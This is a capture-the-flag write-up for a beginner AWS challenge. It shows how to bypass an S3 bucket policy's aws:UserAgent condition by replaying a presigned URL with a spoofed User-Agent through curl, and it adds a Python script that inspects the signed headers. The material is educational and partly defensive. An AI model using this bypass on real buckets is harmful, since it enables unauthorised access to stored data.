• Category: none
  • Difficulty: beginner
  • Author: gyrospectre

In this challenge, CI/CD pipelines and Terraform are being used to manage AWS resources. Part of this infrastructure utilises an S3 bucket, which is used to stage files and configuration. Being security conscious individuals, the admins have prevented misuse of this bucket by configuring access only to Terraform. They are also using S3 presigned URLs to provide timeboxed access to certain files without sharing credentials.

Given a presigned URL for flag.txt (generated by the CI/CD pipeline user), and the resource policy applied to the S3 bucket, find a way to get at the flag!

If you need a primer on some of the AWS concepts at play here:

  • https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html
  • https://docs.aws.amazon.com/AmazonS3/latest/userguide/example-bucket-policies.html
  • https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html#policy-eval-basics-id-rdp

    Handout files

  • s3_presigned_url.txt
https://kickme-95f596ff5b61453187fbc1c9faa3052e.s3.us-east-1.amazonaws.com/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAXC42U7VJ7MRP6INU%2F20250715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250715T124755Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=6cefb6299d55fb9e2f97e8d34a64ad8243cdb833e7bdf92fc031d57e96818d9b
  • s3_resource_policy.txt
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": [
        "arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e/flag.txt",
        "arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e"
      ],
      "Principal": {
        "AWS": "arn:aws:iam::487266254163:user/pipeline"
      },
      "Condition": {
        "StringLike": {
          "aws:UserAgent": "aws-sdk-go*"
        }
      }
    }
  ]
}

Solve

  • The bucket policy grants s3:GetObject to the pipeline user only when the request's aws:UserAgent matches aws-sdk-go* (StringLike, so * is a wildcard and the match is case-sensitive).
  • The presigned URL already carries that user's identity and signature, and its X-Amz-SignedHeaders value is just host, so the User-Agent header is not covered by the signature: whoever holds the URL can send any User-Agent they like. AWS's own documentation warns that aws:UserAgent is caller-supplied and should not be relied on to keep unauthorised parties out.
  • To get the flag through s3:GetObject, I used the presigned URL with curl -A "aws-sdk-go*" "s3_presigned_url" (-A / --user-agent) to set the matching User-Agent and retrieve flag.txt.
  • The URL is time-boxed: X-Amz-Expires=604800 means it is valid for seven days from X-Amz-Date (2025-07-15T12:47:55Z), after which S3 rejects it regardless of the User-Agent sent.
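The following script, added here as an example and not part of the original writeup or challenge, reads the handout presigned URL and bucket policy and shows the two facts the solve rests on: which headers the SigV4 signature covers (only host, so User-Agent is free to change) and which User-Agent strings the policy's StringLike condition accepts. Function names are mine; the StringLike matcher is a minimal re-implementation of IAM's wildcard rules (assumed: * matches any run of characters, ? one character, case-sensitive) that evaluates only the aws:UserAgent condition, not full IAM policy logic. It makes no network requests; the final function just assembles the curl invocation.

```python
"""Inspect the handout presigned URL against the handout bucket policy.

Added example for this writeup, not code from the challenge or its author.
Uses only the handout values from the page. The policy matcher is a minimal
re-implementation of IAM StringLike semantics (assumption: '*' and '?'
wildcards, case-sensitive) and evaluates only the aws:UserAgent condition.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Handout values, copied from s3_presigned_url.txt and s3_resource_policy.txt.
PRESIGNED_URL = (
    "https://kickme-95f596ff5b61453187fbc1c9faa3052e.s3.us-east-1.amazonaws.com/flag.txt"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Credential=AKIAXC42U7VJ7MRP6INU%2F20250715%2Fus-east-1%2Fs3%2Faws4_request"
    "&X-Amz-Date=20250715T124755Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host"
    "&X-Amz-Signature=6cefb6299d55fb9e2f97e8d34a64ad8243cdb833e7bdf92fc031d57e96818d9b"
)
BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": "s3:GetObject",
        "Resource": [
            "arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e/flag.txt",
            "arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e",
        ],
        "Principal": {"AWS": "arn:aws:iam::487266254163:user/pipeline"},
        "Condition": {"StringLike": {"aws:UserAgent": "aws-sdk-go*"}},
    }],
}


def parse_presigned_url(url: str) -> dict:
    """Pull bucket, key and the SigV4 query parameters out of a presigned URL."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    access_key, _date_stamp, region, _service, _term = q["X-Amz-Credential"].split("/")
    signed_at = datetime.strptime(q["X-Amz-Date"], "%Y%m%dT%H%M%SZ").replace(tzinfo=timezone.utc)
    return {
        "bucket": parts.hostname.split(".s3.", 1)[0],  # virtual-hosted-style host
        "key": parts.path.lstrip("/"),
        "access_key": access_key,
        "region": region,
        "signature": q["X-Amz-Signature"],
        "signed_at": signed_at,
        "expires_at": signed_at + timedelta(seconds=int(q["X-Amz-Expires"])),
        # Only these headers are covered by the signature; any other header can change.
        "signed_headers": q["X-Amz-SignedHeaders"].lower().split(";"),
    }


def header_is_signed(info: dict, header: str) -> bool:
    """True if changing this header would invalidate the signature."""
    return header.lower() in info["signed_headers"]


def validity_window(info: dict) -> tuple:
    """ISO 8601 start and end of the URL's validity, in UTC."""
    return (info["signed_at"].isoformat(), info["expires_at"].isoformat())


def is_expired(info: dict, now: datetime) -> bool:
    return now >= info["expires_at"]


def iam_string_like(pattern: str, value: str) -> bool:
    """IAM StringLike: '*' matches any run of characters, '?' exactly one; case-sensitive."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, value, flags=re.DOTALL) is not None


def _as_list(x):
    return x if isinstance(x, list) else [x]


def user_agent_allowed(policy: dict, user_agent: str, action: str = "s3:GetObject") -> bool:
    """Does some Allow statement for `action` accept this aws:UserAgent value?

    Principal and resource are already satisfied by the presigned URL itself,
    so only the StringLike aws:UserAgent condition is checked here.
    """
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow" or action not in _as_list(stmt.get("Action", [])):
            continue
        patterns = stmt.get("Condition", {}).get("StringLike", {}).get("aws:UserAgent", "*")
        if any(iam_string_like(p, user_agent) for p in _as_list(patterns)):
            return True
    return False


def curl_command(url: str, user_agent: str) -> list:
    """The request to send: -A / --user-agent sets the unsigned User-Agent header."""
    return ["curl", "-A", user_agent, url]


if __name__ == "__main__":
    info = parse_presigned_url(PRESIGNED_URL)
    print(f"object: s3://{info['bucket']}/{info['key']} signed by {info['access_key']}")
    print("valid from/to:", *validity_window(info))
    print("User-Agent signed?", header_is_signed(info, "User-Agent"))
    for ua in ("curl/8.0.1", "aws-sdk-go*", "aws-sdk-go-v2/1.24.0"):
        print(f"{ua!r:28} allowed by policy: {user_agent_allowed(BUCKET_POLICY, ua)}")
    print(" ".join(curl_command(PRESIGNED_URL, "aws-sdk-go*")))
```

Running it with the handout values reports that only host is signed, that curl's default User-Agent fails the condition while anything starting with aws-sdk-go passes, and that the URL stops working at 2025-07-22T12:47:55Z. The same parser is useful defensively: a presigned URL whose X-Amz-SignedHeaders list omits a header that a bucket policy conditions on is a sign that the condition is not doing what its author thinks.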